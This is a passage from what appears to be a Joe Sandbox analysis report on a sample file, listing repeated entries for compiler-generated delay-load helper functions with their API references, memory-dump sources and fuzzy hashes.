Part of subcall function 0013E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0013E8E1

Memory Dump Source

Source File: 00000000.00000002.1643815804.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.1643793875.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643851950.0000000000153000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.000000000015E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000182000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643942061.0000000000183000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_yX8787W7de.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 3707aeb5dc308afb6b26831b0ba87e403542fe27fce0e18a58464b5ac5941e6a
Instruction ID: 1c3ea6a958f10e6917d4abe559c4571cb0ecbf1fb4183079a555138d289a0d82
Opcode Fuzzy Hash: 3707aeb5dc308afb6b26831b0ba87e403542fe27fce0e18a58464b5ac5941e6a
Instruction Fuzzy Hash: 6DB012D1369340ECB10871451D06C37018DC1C1F11B30C07EFC25C40C0EB40AD040D71

Uniqueness

Uniqueness Score: -1.00%

Function 0013E264 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0013E1E3

Part of subcall function 0013E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0013E8D0
Part of subcall function 0013E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0013E8E1

Memory Dump Source

Source File: 00000000.00000002.1643815804.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.1643793875.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643851950.0000000000153000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.000000000015E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000182000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643942061.0000000000183000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_yX8787W7de.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: db47858543ca69cc06bc4495fb28dd4b3fe7c7eddf01c342c884699b1af928b4
Instruction ID: f6ceae7ba7e0a17086d853639361493d3c2be0fa5f1cb55d32b51ffead76aa93
Opcode Fuzzy Hash: db47858543ca69cc06bc4495fb28dd4b3fe7c7eddf01c342c884699b1af928b4
Instruction Fuzzy Hash: 5CB012D1379340ECB10871851D06C3701CDC5C0F11B30807EFC26C40C0EB406D040D71

Uniqueness

Uniqueness Score: -1.00%

Function 0013E26E Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0013E1E3

Part of subcall function 0013E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0013E8D0
Part of subcall function 0013E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0013E8E1

Memory Dump Source

Source File: 00000000.00000002.1643815804.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.1643793875.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643851950.0000000000153000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.000000000015E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000182000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643942061.0000000000183000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_yX8787W7de.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 6c7ea895c3fe6b705f305d95fa4fbead55b964096ee8105411be4a8967b9e143
Instruction ID: 248375062fcfe2e792aeebba12d75aa47b49704e316596403561a89abde043a0
Opcode Fuzzy Hash: 6c7ea895c3fe6b705f305d95fa4fbead55b964096ee8105411be4a8967b9e143
Instruction Fuzzy Hash: 81B012D1368300ECB108B1551D06C3702CCC1C1F11730C07EFC25C40C0EB40AD040D71

Uniqueness

Uniqueness Score: -1.00%

Function 0013E282 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0013E1E3

Part of subcall function 0013E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0013E8D0
Part of subcall function 0013E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0013E8E1

Memory Dump Source

Source File: 00000000.00000002.1643815804.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.1643793875.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643851950.0000000000153000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.000000000015E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000182000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643942061.0000000000183000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_yX8787W7de.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: b16b6e19e88615cc93c34ab3e96dfa4496c940a7ba6621edc718ebe19980305b
Instruction ID: 493fc874a33a4c7ef0054defda20ec6f940d7dc0cc9c584064efc8cf216a00b0
Opcode Fuzzy Hash: b16b6e19e88615cc93c34ab3e96dfa4496c940a7ba6621edc718ebe19980305b
Instruction Fuzzy Hash: AEB092E1268200ECA108A1451A06C3702CCC180F11B20806AB825C40C0AA416A050971

Uniqueness

Uniqueness Score: -1.00%

Function 0013E419 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0013E3FC

Part of subcall function 0013E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0013E8D0
Part of subcall function 0013E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0013E8E1

Memory Dump Source

Source File: 00000000.00000002.1643815804.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.1643793875.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643851950.0000000000153000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.000000000015E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000182000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643942061.0000000000183000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_yX8787W7de.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 9be61635dc1a25da746e5fecc8d97842acfe20f7ec822756e78db11f2ae6bc5f
Instruction ID: 4c73626d3cb546f2b3872da10eca345845dbdee497aa1581c0c78d04b003d649
Opcode Fuzzy Hash: 9be61635dc1a25da746e5fecc8d97842acfe20f7ec822756e78db11f2ae6bc5f
Instruction Fuzzy Hash: 1CB012E125C300FCB10861041E02C3702DCD1C0F11730C02EF924F91C0DB400E0E0973

Uniqueness

Uniqueness Score: -1.00%

Function 0013E423 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0013E3FC

Part of subcall function 0013E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0013E8D0
Part of subcall function 0013E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0013E8E1

Memory Dump Source

Source File: 00000000.00000002.1643815804.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.1643793875.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643851950.0000000000153000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.000000000015E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000182000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643942061.0000000000183000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_yX8787W7de.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 60b3e6648069ca6585b32e3d71a92ded3ee2e1c88f3730c65f5167cd9bf173cd
Instruction ID: b4097438b7bf0757a5c8e0dfe2ea5a3b0857ebfc644b9ab77d0749e5fcd4e11e
Opcode Fuzzy Hash: 60b3e6648069ca6585b32e3d71a92ded3ee2e1c88f3730c65f5167cd9bf173cd
Instruction Fuzzy Hash: 68B012F125C300FCB108A1041D02C3702DCC1C0F15730802EFC24E51C0DB404F090973

Uniqueness

Uniqueness Score: -1.00%

Function 0013E44B Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0013E3FC

Part of subcall function 0013E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0013E8D0
Part of subcall function 0013E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0013E8E1

Memory Dump Source

Source File: 00000000.00000002.1643815804.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.1643793875.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643851950.0000000000153000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.000000000015E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000182000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643942061.0000000000183000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_yX8787W7de.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: be8381d99ebce45f41ee1bdc163e071d146fd3e3d23ea18d9f7d2861f3fd60ba
Instruction ID: f409a886d8ace1c54d7e869a2b8b05e6dc33bedd0cefd95f3b0e7328f5d2490c
Opcode Fuzzy Hash: be8381d99ebce45f41ee1bdc163e071d146fd3e3d23ea18d9f7d2861f3fd60ba
Instruction Fuzzy Hash: 01B092A1258200ECA108A1041902C360298C180B11720802AB824E51C0DA404A090973

Uniqueness

Uniqueness Score: -1.00%

Function 0013E50D Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0013E51F

Part of subcall function 0013E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0013E8D0
Part of subcall function 0013E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0013E8E1

Memory Dump Source

Source File: 00000000.00000002.1643815804.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.1643793875.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643851950.0000000000153000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.000000000015E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000182000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643942061.0000000000183000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_yX8787W7de.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 441152fcc6bd4a66d097c4334185fea3cce7f5e1bf66e711e60ae54b90f3e964
Instruction ID: a2304420b6896debe633d93b1a6c4bc43dfeacc75afadbb724d253bdd519da57
Opcode Fuzzy Hash: 441152fcc6bd4a66d097c4334185fea3cce7f5e1bf66e711e60ae54b90f3e964
Instruction Fuzzy Hash: DAB012C5658300FCB10821241D06C3B014CC2C1F15B30403EFC30D44C1AB404F480871

Uniqueness

Uniqueness Score: -1.00%

Function 0013E532 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0013E51F

Part of subcall function 0013E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0013E8D0
Part of subcall function 0013E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0013E8E1

Memory Dump Source

Source File: 00000000.00000002.1643815804.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.1643793875.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643851950.0000000000153000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.000000000015E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000182000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643942061.0000000000183000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_yX8787W7de.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 8aff6a897321667fa01520bfd2a584f1bbef7ac17db918cc1c66db6e7461cd1b
Instruction ID: 292935e7c070ece33c7bc6f4280aceb7ab9894f0026009d67f811ffc6e96882e
Opcode Fuzzy Hash: 8aff6a897321667fa01520bfd2a584f1bbef7ac17db918cc1c66db6e7461cd1b
Instruction Fuzzy Hash: 33B012C5658300FDB10861081D02D3B018CC2C1F15730402EF824C41C0EB404E440971

Uniqueness

Uniqueness Score: -1.00%

Function 0013E528 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0013E51F

Part of subcall function 0013E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0013E8D0
Part of subcall function 0013E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0013E8E1

Memory Dump Source

Source File: 00000000.00000002.1643815804.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.1643793875.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643851950.0000000000153000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.000000000015E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000182000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643942061.0000000000183000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_yX8787W7de.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 4a16b49d848a92024fa5140289f62543eedf81034d85a821f4f5d19b0e680797
Instruction ID: 58561f00573ea6609695f8d975adad907c3291a4f8994ceef564f91ee4c774a4
Opcode Fuzzy Hash: 4a16b49d848a92024fa5140289f62543eedf81034d85a821f4f5d19b0e680797
Instruction Fuzzy Hash: 58B012C5658340FCB10861081E02C3B058CC2C1F15730802EF824C82C0EB404E450971

Uniqueness

Uniqueness Score: -1.00%

Function 0013E546 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0013E51F

Part of subcall function 0013E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0013E8D0
Part of subcall function 0013E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0013E8E1

Memory Dump Source

Source File: 00000000.00000002.1643815804.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.1643793875.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643851950.0000000000153000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.000000000015E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000182000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643942061.0000000000183000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_yX8787W7de.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: dbeb54c1b058864cc352606ffb3d5b4e4fdb16cec42e988cb33388dfffc4a5c1
Instruction ID: 55c79199909ab21b28be6f4623c7a2853600d104f818a3505835c5fcdbaace1d
Opcode Fuzzy Hash: dbeb54c1b058864cc352606ffb3d5b4e4fdb16cec42e988cb33388dfffc4a5c1
Instruction Fuzzy Hash: 2AB012C5658300FCB20861089D03C3B018CC2C1F15730422EF824C41C0EB404E881971

Uniqueness

Uniqueness Score: -1.00%

Function 0013E593 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0013E580

Part of subcall function 0013E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0013E8D0
Part of subcall function 0013E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0013E8E1

Memory Dump Source

Source File: 00000000.00000002.1643815804.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.1643793875.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643851950.0000000000153000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.000000000015E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000182000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643942061.0000000000183000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_yX8787W7de.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: d0d0f1811d528c0a458015100871cb56be0eb37a03db33b2551bf1c2fff6ccde
Instruction ID: 72213262967d34e71b9ad28b7684160e73764aad2a8e76aec4cec044cf8ecf5a
Opcode Fuzzy Hash: d0d0f1811d528c0a458015100871cb56be0eb37a03db33b2551bf1c2fff6ccde
Instruction Fuzzy Hash: C4B012C5698300FDB10861541D06C3701CCC2C0F15731402EF824C51C0EB400E040971

Uniqueness

Uniqueness Score: -1.00%

Function 0013E5B1 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0013E580

Part of subcall function 0013E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0013E8D0
Part of subcall function 0013E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0013E8E1

Memory Dump Source

Source File: 00000000.00000002.1643815804.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.1643793875.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643851950.0000000000153000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.000000000015E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000182000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643942061.0000000000183000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_yX8787W7de.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 31048420a9b7d7c8f9894e0bd94a3b7d0ed7d75112843fce267cb002cc57878b
Instruction ID: 605f0add966c0255fb2c785cb4d1ebd24393654c6df0c5a4b53151e4167ababd
Opcode Fuzzy Hash: 31048420a9b7d7c8f9894e0bd94a3b7d0ed7d75112843fce267cb002cc57878b
Instruction Fuzzy Hash: 0CB012C5698300FCB14861549D07C3701DCC2C0F15735422EF824C51C4EB400E440A71

Uniqueness

Uniqueness Score: -1.00%

Function 0013E5A7 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0013E580

Part of subcall function 0013E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0013E8D0
Part of subcall function 0013E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0013E8E1

Memory Dump Source

Source File: 00000000.00000002.1643815804.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.1643793875.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643851950.0000000000153000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.000000000015E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000182000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643942061.0000000000183000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_yX8787W7de.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 54279ff7501ce785a38f29df0aca55543bb4c449ab446534b0649fafcda480c8
Instruction ID: bb520623f7a207b36993dc8e2842bc7c7f1ebedea40ae2269a1b48363903ba65
Opcode Fuzzy Hash: 54279ff7501ce785a38f29df0aca55543bb4c449ab446534b0649fafcda480c8
Instruction Fuzzy Hash: 0AB012C5698300FCB10861945E06C3701DCC2C0F15735422EF824C51C4EF400F050971

Uniqueness

Uniqueness Score: -1.00%

Function 0013E219 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0013E1E3

Part of subcall function 0013E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0013E8D0
Part of subcall function 0013E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0013E8E1

Memory Dump Source

Source File: 00000000.00000002.1643815804.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.1643793875.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643851950.0000000000153000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.000000000015E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000182000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643942061.0000000000183000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_yX8787W7de.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 4e455f8166961e8d4981b23ab0fcbcfd40c45d9175983a529ad85c0495f46cc3
Instruction ID: d0122e154b6d1ff51448f727ea33443091f18246b10dd65eeb230a9382be0939
Opcode Fuzzy Hash: 4e455f8166961e8d4981b23ab0fcbcfd40c45d9175983a529ad85c0495f46cc3
Instruction Fuzzy Hash: 46A001E66A9342FCB10866926D06C3B029DC4D5B66B3189AEFC26C84C5AA91684918B1

Uniqueness

Uniqueness Score: -1.00%

Function 0013E25F Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0013E1E3

Part of subcall function 0013E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0013E8D0
Part of subcall function 0013E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0013E8E1

Memory Dump Source

Source File: 00000000.00000002.1643815804.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.1643793875.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643851950.0000000000153000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.000000000015E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000182000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643942061.0000000000183000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_yX8787W7de.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: d60798f36281f22be5e545e84ba4f39c0d954e27f52cbfa53a669d2dee821d46
Instruction ID: d0122e154b6d1ff51448f727ea33443091f18246b10dd65eeb230a9382be0939
Opcode Fuzzy Hash: d60798f36281f22be5e545e84ba4f39c0d954e27f52cbfa53a669d2dee821d46
Instruction Fuzzy Hash: 46A001E66A9342FCB10866926D06C3B029DC4D5B66B3189AEFC26C84C5AA91684918B1

Uniqueness

Uniqueness Score: -1.00%

Function 0013E27D Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0013E1E3

Part of subcall function 0013E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0013E8D0
Part of subcall function 0013E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0013E8E1

Memory Dump Source

Source File: 00000000.00000002.1643815804.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.1643793875.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643851950.0000000000153000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.000000000015E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000182000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643942061.0000000000183000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_yX8787W7de.jbxd

Similarity

